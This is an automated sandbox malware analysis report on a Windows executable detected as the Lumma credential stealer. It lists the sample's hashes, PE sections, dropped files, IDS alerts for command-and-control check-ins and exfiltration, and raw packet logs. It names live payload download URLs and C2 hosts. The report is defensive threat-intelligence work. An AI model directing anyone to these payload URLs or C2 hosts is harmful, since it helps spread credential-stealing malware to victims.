http://185.215.113.16/off/def.exek	file.exe, 00000000.00000002.2303859977.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301508761.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.170.64	crisiwarny.store	United States		13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543498
Start date and time:	2024-10-28 02:06:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 6180 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
21:07:03	API Interceptor	11x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.170.64	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	wo4POc0NG1.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	MilkaCheats.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
185.215.113.16	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	wo4POc0NG1.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
crisiwarny.store	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	wo4POc0NG1.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.95.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	172.67.180.76
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	SecuriteInfo.com.Win32.PWSX-gen.884.23076.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Remittance Receipt.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	https://bit.ly/3Cbulr1	Get hash	malicious	Unknown	Browse	172.67.154.120
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	SecuriteInfo.com.Win32.PWSX-gen.884.23076.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exe	Get hash	malicious	LummaC	Browse	172.67.170.64

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4LSU4O6YQKPDF8R94WQ6K0Z23.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2783232
Entropy (8bit):	6.516373019402693
Encrypted:	false
SSDEEP:	49152:Mu1kachD6DYLAbQuK0fIV8tDvz7qVW+A19ekEjA6yKS:Mu1kachD6DYLAbQdkIV8tLzeQ+eUdByK
MD5:	1D792472559DBD0C610878880006F977
SHA1:	2A5BA600A6B9C43C110985380882E0FBE3CCAC40
SHA-256:	BDD4E66F1F848BCF6B72E4F57C2095CC0FB9F74E752ED484FD53A6F9886A4352
SHA-512:	8E47C5D58B2D6C201AC1BAA1A221D764FF4B242A764E3A67DCC91B9E0DD0574D6F396FFD81FC009BF896F99C3BB97D1638E15481490DE524A2D7961D71B9A72A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ....................... +.....C....`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...vapebhpc. .........:..............@...vabnfpbo. ..........R.............@....taggant.@......"...V.............@...................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.506558029032357
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'037'696 bytes
MD5:	d982361460f61047f7eeff2e03e61d91
SHA1:	6d37f680a2280e48f82ef28ad5af9df24af6cb36
SHA256:	8841385bb1affb88e7a23ea5569e36e0ed09627cd79ec6218b70cbedab3a9c64
SHA512:	e671dd2fceb0426eb127b5ab2ca0801d32736fa12b8ee99a582c3619171ef330f975619b33851c723ca50372e60a667e5d162f22fefe7a60bcb1c6d2e263347b
SSDEEP:	49152:383XJ6lgW7SRWIsMHBupTCMUWjeT8asWagT4v9uqZwouf:M3Xc2RWIsMHBupTjjeHlkvViou
TLSH:	EEE53AA1A805BACFD49E1774942BDD82A85D03B9071148CFD868A67E7D73EC216FFC24
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p1...........@...........................1.....4.....@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x717000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F9D48814D9Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x27e00	11184c04993bf9acc806f286f5f45bf3	False	0.9976856387147336	data	7.965076587141377	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gafnxzej	0x5b000	0x2bb000	0x2ba400	f2e2cb2d1df20f6532a3fd4da1324009	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bpwpzarm	0x316000	0x1000	0x400	c6e81f9099d6bf88bebb72dac724b028	False	0.779296875	data	6.136775112686309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x317000	0x3000	0x2200	6ea78a892dd9d50a6dd36f1a1f7fe349	False	0.08145680147058823	DOS executable (COM)	0.9844463030021424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T02:07:05.754683+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	172.67.170.64	443	TCP
2024-10-28T02:07:05.754683+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	172.67.170.64	443	TCP
2024-10-28T02:07:09.140172+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	172.67.170.64	443	TCP
2024-10-28T02:07:09.140172+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	172.67.170.64	443	TCP
2024-10-28T02:07:15.392619+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	172.67.170.64	443	TCP
2024-10-28T02:07:16.524523+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49710	172.67.170.64	443	TCP
2024-10-28T02:07:21.691294+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	172.67.170.64	443	TCP
2024-10-28T02:07:22.604846+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49724	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 02:07:04.527406931 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:04.527462959 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:04.527601004 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:04.528737068 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:04.528763056 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.165323973 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.165472031 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.168895006 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.168922901 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.169323921 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.216531038 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.249382973 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.249434948 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.249634027 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.754805088 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.755033970 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.755105019 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.756896019 CET	49704	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.756926060 CET	443	49704	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.883883953 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.883927107 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:05.884033918 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.884351015 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:05.884360075 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:06.522795916 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:06.523271084 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:06.526196957 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:06.526207924 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:06.526554108 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:06.528038025 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:06.528038979 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:06.528168917 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140188932 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140250921 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140289068 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140327930 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140367985 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140372038 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.140372038 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.140387058 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140431881 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.140438080 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140801907 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.140888929 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.140893936 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.145705938 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.145775080 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.145780087 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.185333014 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262192011 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262312889 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262348890 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262415886 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262425900 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262458086 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262484074 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262526035 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262681961 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262681961 CET	49705	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.262696981 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.262705088 CET	443	49705	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.383477926 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.383619070 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:09.383732080 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.384109974 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:09.384147882 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.032058954 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.032188892 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.033951998 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.033991098 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.034517050 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.045209885 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.045474052 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.045526028 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.629787922 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.629949093 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.630033016 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.630214930 CET	49706	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.630260944 CET	443	49706	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.753273964 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.753309965 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:10.753446102 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.753915071 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:10.753927946 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:11.373588085 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:11.373707056 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:11.375719070 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:11.375727892 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:11.376187086 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:11.377564907 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:11.377706051 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:11.377748966 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:11.377887011 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:11.377892971 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:12.238970995 CET	443	49707	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:12.239263058 CET	49707	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:12.472284079 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:12.472362041 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:12.472433090 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:12.472763062 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:12.472779036 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:13.083620071 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:13.083720922 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:13.085015059 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:13.085022926 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:13.085254908 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:13.086683035 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:13.086900949 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:13.086931944 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:13.086996078 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:13.087003946 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.072232962 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.072489023 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.072665930 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.072829962 CET	49708	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.072849035 CET	443	49708	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.281582117 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.281619072 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.281692982 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.281964064 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.281975985 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.891829967 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.891968966 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.893393040 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.893407106 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.893647909 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:14.894917965 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.895036936 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:14.895044088 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:15.392652988 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:15.392777920 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:15.392842054 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:15.392970085 CET	49709	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:15.392983913 CET	443	49709	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:15.904928923 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:15.904992104 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:15.905067921 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:15.905432940 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:15.905447960 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.519718885 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.519859076 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.521132946 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.521147966 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.521548986 CET	443	49710	172.67.170.64	192.168.2.5
Oct 28, 2024 02:07:16.523104906 CET	49710	443	192.168.2.5	172.67.170.64
Oct 28, 2024 02:07:16.523811102 CET	49710	443	192.168.2.5	172.67.170.64
